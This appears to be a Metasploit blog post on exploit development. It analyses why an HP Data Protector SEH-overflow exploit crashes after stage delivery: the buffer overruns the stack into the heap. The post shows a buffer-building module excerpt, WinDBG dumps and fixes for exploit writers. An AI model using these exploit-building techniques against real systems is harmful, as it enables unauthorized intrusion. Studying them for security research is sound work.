Last updated at Wed, 27 Sep 2017 02:27:50 GMT
Last year at BSides Vegas, James Lee (egypt) and David Rude (bannedit) gave a presentation called "Long Beard's Guide to Exploit Dev". During the talk, James said one thing that I'll never forget: "exploit development is never an easy task, because pretty much every step you do -- finding the offset, finding a return value, using a ROP gadget, etc -- could lead to a failure." Ain't that the truth! But here's the thing: exploits don't just fail before you pop a shell, they can also fail WHILE you're getting a shell... and that's where my story begins.
Let's say you're writing an exploit. You've done all the hard work to put it all together: you spent days in a debugger doing some decent root cause analysis on the bug, you found all the bad characters, you bypassed memory protections such as /GS and SafeSEH, you ROP'd it like a ROP star, and you bypassed ASLR like a boss. Your friends praise you for the accomplishment, some people might even call your exploit "sophisticated"... and then all of a sudden, this is all the "code execution" you get out of your awesome exploit:
msf exploit(0day) > exploit
[*] Server started.
[*] Sending request to 10.0.1.4:80...
[*] Leaked address: 0x61990000
[*] Sending final payload...
[*] Sending stage (752128 bytes) to 10.0.1.4
"Hey, WTH?", you say. For some reason the exploit fails after you've sent the second stage to the vulnerable application, and then the server crashes (this is the key behavior). You fire the module a couple more times just to make sure, but you get the same thing. Your shell keeps slipping away from your fingertips... what a nightmare! This is a pretty nasty problem, because the root cause most likely lies in the exploit itself. It can also be a hassle to fix, and you will see why when you get to the solutions at the end. But for now, I should probably explain why this is happening.
We ran into the same problem recently while developing the exploit for HP Data Protector, so I'll use that as a case study. During the later stage of the development of that module, the buffer was crafted this way:
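print_status("Using egghunter with checksum")
# hunter = the small search stub, egg = the tagged payload it looks for
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true, :eggtag => 'w00t' })
my_payload = egg
# Pad up to the offset of the SEH record
my_payload << "A"*(target['Offset']-my_payload.length)
# Overwrite the SEH record, then place the egghunter right after it
my_payload << generate_seh_record(target.ret)
my_payload << hunter
# Fill the rest of the buffer up to 4080 bytes
my_payload << "A"*(4080-my_payload.length)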
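To get a feel for how much of that buffer is plain filler, here is a rough stand-alone sketch that replays the same layout outside of Metasploit. The egg size, hunter size, and offset are made-up placeholders (the real values come from the module and its target), and `build_layout` is a hypothetical helper, not a Metasploit API.

```ruby
# Stand-alone sketch of the buffer layout; no Metasploit required.
# All sizes passed in below are hypothetical placeholders.
MAX_LEN = 4080 # total buffer size used in the excerpt

def build_layout(egg:, seh_record:, hunter:, offset:, total: MAX_LEN)
  buf = egg.dup
  buf << "A" * (offset - buf.length) # pad up to the SEH record
  seh_at = buf.length
  buf << seh_record
  hunter_at = buf.length
  buf << hunter
  filler_at = buf.length
  buf << "A" * (total - buf.length)  # trailing filler written after the hunter
  { buffer: buf, seh_at: seh_at, hunter_at: hunter_at,
    filler_at: filler_at, filler_len: total - filler_at }
end

layout = build_layout(
  egg:        "E" * 400, # stand-in for the tagged payload
  seh_record: "S" * 8,   # an SEH record is two 4-byte fields
  hunter:     "H" * 60,  # stand-in for the egghunter stub
  offset:     1000       # hypothetical target['Offset']
)

puts "SEH record at offset #{layout[:seh_at]}"
puts "hunter at offset     #{layout[:hunter_at]}"
puts "trailing filler:     #{layout[:filler_len]} bytes"
```

With these placeholder sizes, roughly three quarters of the buffer is trailing "A"s that land after the egghunter.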
As you can see, the max buffer size is 4080 bytes -- this is key. When we fired up this module, we saw the same stage delivery message, and then hit this bug:
0:008> r
eax=03f664d4 ebx=3743fde1 ecx=0000c9ed edx=000c1000 esi=3743fdc9 edi=03f501a4
eip=7c952d6b esp=019ed278 ebp=019ed2ec iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
ntdll!RtlQueryProcessHeapInformation+0x2ba:
7c952d6b 8b4e14 mov ecx,dword ptr [esi+14h] ds:0023:3743fddd=????????
0:008> k
ChildEBP RetAddr
019ed2ec 7c953341 ntdll!RtlQueryProcessHeapInformation+0x2ba
019ed348 7c864afe ntdll!RtlQueryProcessDebugInformation+0x1ee
019ed36c 03bd7e23 kernel32!Heap32First+0x48
WARNING: Frame IP not in any known module. Following frames may be wrong.
019edc2c 7c802600 +0x3bd7e22
019edc7c 00000000 kernel32!WaitForSingleObjectEx+0xd8
We should probably point out that the value in ESI actually comes from a user-supplied string. We were able to determine this because, when we tested the module again with pattern_create() instead of a long string of "A"s, pattern_offset.rb was able to locate the value... exactly 38 bytes after the egghunter. So the above WinDBG log shows that after the staged payload is delivered, there is some sort of heap corruption, and evidently our string has something to do with it.
Remember, this buffer overflow is supposed to be all stack smashing. But when we examined the memory more closely, comparing a non-crashy request against the crashy one, we found something interesting. The following is the memory dump starting at the SEH record (the one we overwrite):
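If you haven't used the pattern trick before, the idea can be sketched in a few lines of Ruby. This is a simplified re-implementation for illustration only, not the code Metasploit ships, and the register value used in the example is made up rather than taken from the crash above.

```ruby
# Simplified cyclic pattern in the familiar "Aa0Aa1Aa2..." style.
# An illustration only; it is not the Metasploit implementation.
def pattern_create(length)
  out = +""
  ("A".."Z").each do |upper|
    ("a".."z").each do |lower|
      ("0".."9").each do |digit|
        return out[0, length] if out.length >= length
        out << upper << lower << digit
      end
    end
  end
  out[0, length]
end

# Accepts either a register value (Integer, read as a little-endian dword)
# or a raw substring, and returns its offset in the pattern (nil if absent).
def pattern_offset(pattern, value)
  needle = value.is_a?(Integer) ? [value].pack("V") : value
  pattern.b.index(needle.b)
end

pattern = pattern_create(4080)
puts pattern[0, 12]                      # Aa0Aa1Aa2Aa3
puts pattern_offset(pattern, 0x41326141) # 6
```

Because every 4-byte window of the pattern is distinct, a value that shows up in a register or on the heap tells you which part of your buffer ended up there.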
Address | Stack from the healthy version of the exploit | Stack from the non-healthy version of the exploit | Notes |
---|---|---|---|
0244ff9c | d64d06eb | d64d06eb | |
0244ffa0 | 66dd3e49 | 66dd3e49 | SE Handler |
0244ffa4 | ffca8166 | ffca8166 | |
0244ffa8 | 6a52420f | 6a52420f | |
0244ffac | 2ecd5802 | 2ecd5802 | |
0244ffb0 | 745a053c | 745a053c | |
0244ffb4 | 3077b8ef | 3077b8ef | |
0244ffb8 | d7897430 | d7897430 | |
0244ffbc | afea75af | afea75af | |
0244ffc0 | 3151e775 | 3151e775 | |
0244ffc4 | 02c031c9 | 02c031c9 | |
0244ffc8 | 66410f04 | 66410f04 | |
0244ffcc | 013df981 | 013df981 | |
0244ffd0 | 043af575 | 043af575 | |
0244ffd4 | d175590f | d175590f | |
0244ffd8 | 3077e7ff | 41414141 | |
0244ffdc | ff007430 | 41414141 | |
0244ffe0 | 7c839ac0 | 41414141 | healthy: kernel32!_except_handler3 |
0244ffe4 | 7c80b720 | 41414141 | healthy: kernel32!`string'+0x88 |
0244ffe8 | 00000000 | 00000000 | |
0244ffec | 00000000 | 00000000 | |
0244fff0 | 00000000 | 00000000 | |
0244fff4 | 1022db2c | 41414141 | healthy: dpwinsup!Mbcsisupper+0x21d627 |
0244fff8 | 019d75a0 | 41414141 | |
0244fffc | 00000000 | 04141414 | Still stack |
02450000 | 000000c1 | 41414141 | starting here is the heap |
02450004 | 0000017a | 41414141 | |
02450008 | eeffeeff | 41414141 | |
0245000c | 00001003 | 41414141 | |
02450010 | 00000001 | 41414141 | |
02450014 | 0000fe00 | 41414141 | |
02450018 | 00100000 | 41414141 | |
0245001c | 00002000 | 41414141 | |
02450020 | 00000200 | 41414141 | |
02450024 | 00002000 | 41414141 | |
02450028 | 00001f6d | 41414141 | |
0245002c | 7ffdefff | 41414141 | |
02450030 | 06080019 | 41414141 | |
In case you haven't noticed, yes, while the exploit is overflowing the stack, it's also writing to the heap. A simple !address command verifies this:
0:010> !address 0244fffc
02350000 : 02440000 - 00010000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageStack
Pid.Tid 69a0.6ac4
0:010> !address 02450000
02450000 : 02450000 - 00016000
Type 00020000 MEM_PRIVATE
Protect 00000004 PAGE_READWRITE
State 00001000 MEM_COMMIT
Usage RegionUsageHeap
Handle 02450000
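The numbers in the dump and the !address output are enough to work out how little room there is before the heap. The following Ruby snippet just does that arithmetic. The addresses are copied from this one debugging session, so treat them as specific to this run rather than as constants you can rely on.

```ruby
# Addresses taken from the WinDBG output of this particular session.
STACK_BASE   = 0x02440000 # region base reported by !address 0244fffc
STACK_SIZE   = 0x00010000 # region size reported by the same command
HEAP_BASE    = 0x02450000 # region base reported by !address 02450000
SEH_RECORD   = 0x0244ff9c # first dword of the dump, just before the SE Handler
FILLER_START = 0x0244ffd8 # first 0x41414141 dword in the crashing dump

stack_end         = STACK_BASE + STACK_SIZE
room_from_seh     = stack_end - SEH_RECORD
room_after_hunter = stack_end - FILLER_START

puts "stack ends where the heap begins: #{stack_end == HEAP_BASE}"
puts "bytes from the SEH record to the end of the stack: #{room_from_seh}"
puts "bytes of filler that still fit on the stack:       #{room_after_hunter}"
```

In this session there are only 100 bytes between the SEH record and the heap, and about 40 bytes of trailing filler fit on the stack. Everything written past that point goes into the heap.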
The dt command shows what the corrupted heap structure at 0x02450000 looks like:
0:010> dt _HEAP 02450000
ntdll!_HEAP
+0x000 Entry : _HEAP_ENTRY
+0x008 Signature : 0x41414141
+0x00c Flags : 0x41414141
+0x010 ForceFlags : 0x41414141
+0x014 VirtualMemoryThreshold : 0x41414141
+0x018 SegmentReserve : 0x41414141
+0x01c SegmentCommit : 0x41414141
+0x020 DeCommitFreeBlockThreshold : 0x41414141
+0x024 DeCommitTotalFreeThreshold : 0x41414141
+0x028 TotalFreeSize : 0x41414141
+0x02c MaximumAllocationSize : 0x41414141
+0x030 ProcessHeapsListIndex : 0x4141
+0x032 HeaderValidateLength : 0x4141
+0x034 HeaderValidateCopy : 0x41414141
+0x038 NextAvailableTagIndex : 0x4141
+0x03a MaximumTagIndex : 0x4141
+0x03c TagEntries : 0x41414141 _HEAP_TAG_ENTRY
+0x040 UCRSegments : 0x41414141 _HEAP_UCR_SEGMENT
+0x044 UnusedUnCommittedRanges : 0x41414141 _HEAP_UNCOMMMTTED_RANGE
+0x048 AlignRound : 0x41414141
+0x04c AlignMask : 0x41414141
+0x050 VirtualAllocdBlocks : _LIST_ENTRY [ 0x41414141 - 0x41414141 ]
+0x058 Segments : [64] 0x41414141 _HEAP_SEGMENT
+0x158 u : __unnamed
+0x168 u2 : __unnamed
+0x16a AllocatorBackTraceIndex : 0x4141
+0x16c NonDedicatedListLength : 0x41414141
+0x170 LargeBlocksIndex : 0x41414141
+0x174 PseudoTagEntries : 0x41414141 _HEAP_PSEUDO_TAG_ENTRY
+0x178 FreeLists : [128] _LIST_ENTRY [ 0x41414141 - 0x41414141 ]
+0x578 LockVariable : (null)
+0x57c CommitRoutine : (null)
+0x580 FrontEndHeap : (null)
+0x584 FrontHeapLockCount : 0
+0x586 FrontEndHeapType : 0 ''
+0x587 LastSegmentIndex : 0 ''
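A quick way to tell the two cases apart is the Signature field at offset +0x008, which reads 0xeeffeeff in the healthy dump and 0x41414141 in the crashing one. Below is a small Ruby sketch of that check. `heap_signature_ok?` is a hypothetical helper that works on dwords you have already read from the heap base (for example, copied out of the debugger); it does not read process memory itself.

```ruby
HEAP_SIGNATURE        = 0xEEFFEEFF # value seen at +0x008 in the healthy dump
HEAP_SIGNATURE_OFFSET = 0x008      # offset of Signature in the dt _HEAP output

# dwords: array of 32-bit values starting at the heap base address.
def heap_signature_ok?(dwords)
  dwords[HEAP_SIGNATURE_OFFSET / 4] == HEAP_SIGNATURE
end

# First four dwords at 0x02450000, copied from the two dumps.
healthy  = [0x000000c1, 0x0000017a, 0xeeffeeff, 0x00001003]
crashing = [0x41414141, 0x41414141, 0x41414141, 0x41414141]

puts heap_signature_ok?(healthy)  # true
puts heap_signature_ok?(crashing) # false
```

It only tests one field, so a passing check does not prove the heap is intact, but a failing one is a strong hint that your buffer ran past the stack.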
When the payload uses the heap, that's when we get the crash. Based on our data, this crash tends to happen after the handler completes transmitting the payload (that's after recv), when the Tool Help functions end up using the bad heap (CreateToolhelp32Snapshot -> kernel32.Heap32ListFirst -> Heap32First, in particular), causing our Meterpreter to crash. We have also seen other behaviors that lead to the crash, but they trace back to much the same cause.
The Solutions
Now we know that in scenarios like this, the user-supplied buffer is very likely the root cause of the problem. In our case with HP Data Protector, the string is just way too long, and it's overwriting the heap. We have seen a few proven solutions in the past, and here they are:
- Avoid corrupting the heap by reducing the size of your malicious string. This is the simplest approach and the one to try first, but it may not always work, because a smaller buffer may not even trigger the vulnerability you're exploiting.
- Inject your payload somewhere else, where no heap is busted. So far this technique has only been used once, by corelanc0d3r and lincoln. It is similar to using the 'migrate' feature in Meterpreter, except their injection routine runs before the actual Metasploit payload begins. You can read up more about this technique here.
- Induce a heap pointer manually, for example: ms04_011_pct.rb
And hopefully one of the above recommendations will do the trick for you.
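For the first option, one way to think about it is to cap the total buffer length at the point where the stack ends. The sketch below does that with the addresses from this debugging session. The offset and the stand-in buffer are hypothetical, `max_safe_total` and `pad_to` are made-up helper names, and stack addresses can differ between runs and threads, so this is a starting point for experimentation, not a guaranteed fix.

```ruby
STACK_REGION_END = 0x02450000 # end of the stack region in this session
SEH_RECORD_ADDR  = 0x0244ff9c # address of the overwritten SEH record

# Longest buffer that still ends on the stack, given the SEH record's
# offset inside the buffer.
def max_safe_total(seh_offset)
  seh_offset + (STACK_REGION_END - SEH_RECORD_ADDR)
end

# Pad buf with filler up to the requested size, but never past the stack.
def pad_to(buf, requested_total, seh_offset)
  total = [requested_total, max_safe_total(seh_offset)].min
  buf + "A" * [total - buf.length, 0].max
end

offset = 1000                 # hypothetical target['Offset']
buf    = "X" * (offset + 8 + 60) # stand-in for egg + padding + SEH + hunter
padded = pad_to(buf, 4080, offset)

puts max_safe_total(offset) # 1100
puts padded.length          # 1100
```

If the vulnerability stops triggering at the capped length, this option is out and you are back to the other two.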
By the way, in case you're interested in Metasploit module development, make sure to create your development setup, and then join the sweet action of the Metasploit Project. GitHub and Redmine often reveal a lot about how a module is made, and every exploit tends to be a unique story -- great places to begin your exploit development journey!